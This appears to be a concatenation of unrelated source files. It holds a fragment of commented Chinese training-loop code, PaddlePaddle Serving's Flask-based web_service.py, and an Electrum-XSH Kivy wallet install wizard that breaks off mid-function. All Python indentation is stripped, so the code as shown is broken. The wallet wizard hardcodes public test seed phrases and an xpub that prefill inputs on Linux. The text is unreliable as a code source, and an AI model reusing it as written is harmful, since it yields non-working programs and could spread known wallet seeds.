# 平均速度 = np.mean(速度记录[-15000:])
# if 平均分 > 最高分:
# 最高分 = 平均分
#
# print('步数', 步数, '平均分', 平均分,'最高分',最高分,'局数',i,'平均速度',平均速度)
# time.sleep(2)
# while True:
#
# time.sleep(11)
|
web_service.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
# Now, this is only for Pipeline.
from flask import Flask, request, abort
from contextlib import closing
from multiprocessing import Pool, Process, Queue
from paddle_serving_client import Client
from paddle_serving_server import OpMaker, OpSeqMaker, Server
from paddle_serving_server.serve import start_multi_card
import socket
import sys
import numpy as np
import os
from paddle_serving_server import pipeline
from paddle_serving_server.pipeline import Op
from paddle_serving_server.serve import format_gpu_to_strlist
from paddle_serving_server.util import dump_pid_file
def port_is_available(port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('127.0.0.1', port))
if result != 0:
return True
else:
return False
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
# pipeline
self._server = pipeline.PipelineServer(self.name)
self.gpus = ["-1"] # deprecated
self.rpc_service_list = [] # deprecated
def get_pipeline_response(self, read_op):
return None
def prepare_pipeline_config(self, yaml_file):
# build dag
read_op = pipeline.RequestOp()
last_op = self.get_pipeline_response(read_op)
if not isinstance(last_op, Op):
raise ValueError("The return value type of `get_pipeline_response` "
"function is not Op type, please check function "
"`get_pipeline_response`.")
response_op = pipeline.ResponseOp(input_ops=[last_op])
self._server.set_response_op(response_op)
self._server.prepare_server(yaml_file)
def run_service(self):
self._server.run_server()
def load_model_config(self,
server_config_dir_paths,
client_config_path=None):
if isinstance(server_config_dir_paths, str):
server_config_dir_paths = [server_config_dir_paths]
elif isinstance(server_config_dir_paths, list):
pass
for single_model_config in server_config_dir_paths:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
self.server_config_dir_paths = server_config_dir_paths
from .proto import general_model_config_pb2 as m_config
import google.protobuf.text_format
file_path_list = []
for single_model_config in self.server_config_dir_paths:
file_path_list.append("{}/serving_server_conf.prototxt".format(
single_model_config))
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[0], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.feed_vars = {var.alias_name: var for var in model_conf.feed_var}
if len(file_path_list) > 1:
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[-1], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.fetch_vars = {var.alias_name: var for var in model_conf.fetch_var}
if client_config_path == None:
self.client_config_path = file_path_list
# after this function, self.gpus should be a list of str or [].
def set_gpus(self, gpus):
print("This API will be deprecated later. Please do not use it")
self.gpus = format_gpu_to_strlist(gpus)
# this function can be called by user
# or by Function create_rpc_config
# if by user, user can set_gpus or pass the `gpus`
# if `gpus` == None, which means it`s not set at all.
# at this time, we should use self.gpus instead.
# otherwise, we should use the `gpus` first.
# which means if set_gpus and `gpus` is both set.
# `gpus` will be used.
def default_rpc_service(self,
workdir,
port=9292,
gpus=None,
thread_num=4,
mem_optim=True,
use_lite=False,
use_xpu=False,
ir_optim=False,
precision="fp32",
use_calib=False,
use_trt=False,
gpu_multi_stream=False,
runtime_thread_num=None,
batch_infer_size=None):
device = "cpu"
server = Server()
# only when `gpus == None`, which means it`s not set at all
# we will use the self.gpus.
if gpus == None:
gpus = self.gpus
gpus = format_gpu_to_strlist(gpus)
server.set_gpuid(gpus)
if len(gpus) == 0 or gpus == ["-1"]:
if use_lite:
device = "arm"
else:
device = "cpu"
else:
device = "gpu"
op_maker = OpMaker()
op_seq_maker = OpSeqMaker()
read_op = op_maker.create('GeneralReaderOp')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(self.server_config_dir_paths):
infer_op_name = "GeneralInferOp"
if len(self.server_config_dir_paths) == 2 and idx == 0:
infer_op_name = "GeneralDetectionOp"
else:
infer_op_name = "GeneralInferOp"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('GeneralResponseOp')
op_seq_maker.add_op(general_response_op)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_device(device)
server.set_precision(precision)
server.set_use_calib(use_calib)
if use_trt and device == "gpu":
server.set_trt()
server.set_ir_optimize(True)
if gpu_multi_stream and device == "gpu":
server.set_gpu_multi_stream()
if runtime_thread_num:
server.set_runtime_thread_num(runtime_thread_num)
if batch_infer_size:
server.set_batch_infer_size(batch_infer_size)
if use_lite:
server.set_lite()
if use_xpu:
server.set_xpu()
server.load_model_config(self.server_config_dir_paths
) #brpc Server support server_config_dir_paths
server.prepare_server(workdir=workdir, port=port, device=device)
return server
def _launch_rpc_service(self, service_idx):
self.rpc_service_list[service_idx].run_server()
# if use this function, self.gpus must be set before.
# if not, we will use the default value, self.gpus = ["-1"].
# so we always pass the `gpus` = self.gpus.
def create_rpc_config(self):
self.rpc_service_list.append(
self.default_rpc_service(
self.workdir,
self.port_list[0],
self.gpus,
thread_num=self.thread_num,
mem_optim=self.mem_optim,
use_lite=self.use_lite,
use_xpu=self.use_xpu,
ir_optim=self.ir_optim,
precision=self.precision,
use_calib=self.use_calib,
use_trt=self.use_trt,
gpu_multi_stream=self.gpu_multi_stream,
runtime_thread_num=self.runtime_thread_num,
batch_infer_size=self.batch_infer_size))
def prepare_server(self,
workdir,
port=9393,
device="cpu",
precision="fp32",
use_calib=False,
use_lite=False,
use_xpu=False,
ir_optim=False,
thread_num=4,
mem_optim=True,
use_trt=False,
gpu_multi_stream=False,
runtime_thread_num=None,
batch_infer_size=None,
gpuid=None):
print("This API will be deprecated later. Please do not use it")
self.workdir = workdir
self.port = port
self.thread_num = thread_num
# self.device is not used at all.
# device is set by gpuid.
self.precision = precision
self.use_calib = use_calib
self.use_lite = use_lite
self.use_xpu = use_xpu
self.ir_optim = ir_optim
self.mem_optim = mem_optim
self.port_list = []
self.use_trt = use_trt
self.gpu_multi_stream = gpu_multi_stream
self.runtime_thread_num = runtime_thread_num
self.batch_infer_size = batch_infer_size
# record port and pid info for stopping process
dump_pid_file([self.port], "web_service")
# if gpuid != None, we will use gpuid first.
# otherwise, keep the self.gpus unchanged.
# maybe self.gpus is set by the Function set_gpus.
if gpuid != None:
self.gpus = format_gpu_to_strlist(gpuid)
else:
pass
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
self.port_list.append(default_port + i)
break
def _launch_web_service(self):
self.client = Client()
self.client.load_client_config(self.client_config_path)
endpoints = ""
endpoints = "127.0.0.1:{}".format(self.port_list[0])
self.client.connect([endpoints])
def get_prediction(self, request):
if not request.json:
abort(400)
if "fetch" not in request.json:
abort(400)
try:
feed, fetch, is_batch = self.preprocess(request.json["feed"],
request.json["fetch"])
if isinstance(feed, dict) and "fetch" in feed:
del feed["fetch"]
if len(feed) == 0:
raise ValueError("empty input")
fetch_map = self.client.predict(
feed=feed, fetch=fetch, batch=is_batch)
result = self.postprocess(
feed=request.json["feed"], fetch=fetch, fetch_map=fetch_map)
result = {"result": result}
except ValueError as err:
result = {"result": str(err)}
return result
def run_rpc_service(self):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
server_pros = []
self.create_rpc_config()
for i, service in enumerate(self.rpc_service_list):
p = Process(target=self._launch_rpc_service, args=(i, ))
server_pros.append(p)
for p in server_pros:
p.start()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_web_service()
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
# TODO: maybe change another API name: maybe run_local_predictor?
def run_debugger_service(self, gpu=False):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_local_predictor(gpu)
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
def _launch_local_predictor(self, gpu):
# actually, LocalPredictor is like a server, but it is WebService Request initiator
# for WebService it is a Client.
# local_predictor only support single-Model DirPath - Type:str
# so the input must be self.server_config_dir_paths[0]
from paddle_serving_app.local_predict import LocalPredictor
self.client = LocalPredictor()
if gpu:
# if user forget to call function `set_gpus` to set self.gpus.
# default self.gpus = [0].
if len(self.gpus) == 0 or self.gpus == ["-1"]:
self.gpus = ["0"]
# right now, local Predictor only support 1 card.
# no matter how many gpu_id is in gpus, we only use the first one.
gpu_id = (self.gpus[0].split(","))[0]
self.client.load_model_config(
self.server_config_dir_paths[0], use_gpu=True, gpu_id=gpu_id)
else:
self.client.load_model_config(
self.server_config_dir_paths[0], use_gpu=False)
def run_web_service(self):
print("This API will be deprecated later. Please do not use it")
self.app_instance.run(host="0.0.0.0", port=self.port, threaded=True)
def get_app_instance(self):
return self.app_instance
def preprocess(self, feed=[], fetch=[]):
print("This API will be deprecated later. Please do not use it")
is_batch = True
feed_dict = {}
for var_name in self.feed_vars.keys():
feed_dict[var_name] = []
for feed_ins in feed:
for key in feed_ins:
feed_dict[key].append(
np.array(feed_ins[key]).reshape(
list(self.feed_vars[key].shape))[np.newaxis, :])
feed = {}
for key in feed_dict:
feed[key] = np.concatenate(feed_dict[key], axis=0)
return feed, fetch, is_batch
def postprocess(self, feed=[], fetch=[], fetch_map=None):
print("This API will be deprecated later. Please do not use it")
for key in fetch_map:
fetch_map[key] = fetch_map[key].tolist()
return fetch_map
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_xsh.base_wizard import BaseWizard
from electrum_xsh.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_xsh_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
os.unlink(self.wizard.storage.path)
self.wizard.terminate()
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_xsh.mnemonic import Mnemonic
from electrum_xsh.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
Clock.schedule_once(lambda dt: on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
